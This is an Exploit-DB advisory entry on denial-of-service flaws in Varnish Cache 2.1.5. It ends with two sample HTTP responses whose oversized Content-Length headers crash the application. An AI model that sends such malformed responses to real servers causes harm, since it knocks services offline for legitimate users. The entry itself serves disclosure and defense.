Varnish Cache - Multiple Denial of Service Vulnerabilities

EDB-ID:

38364

CVE:

N/A


Platform:

Multiple

Published:

2013-03-05

source: http://www.securityfocus.com/bid/58314/info

Varnish Cache is prone to multiple denial-of-service vulnerabilities.

An attacker can exploit these issues to crash the application, effectively denying service to legitimate users.

Varnish Cache 2.1.5 is vulnerable; other versions may also be affected. 

The following example data is available:

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 99999999999999999

HTTP/1.1 200 OK
Content-Length: 2147483647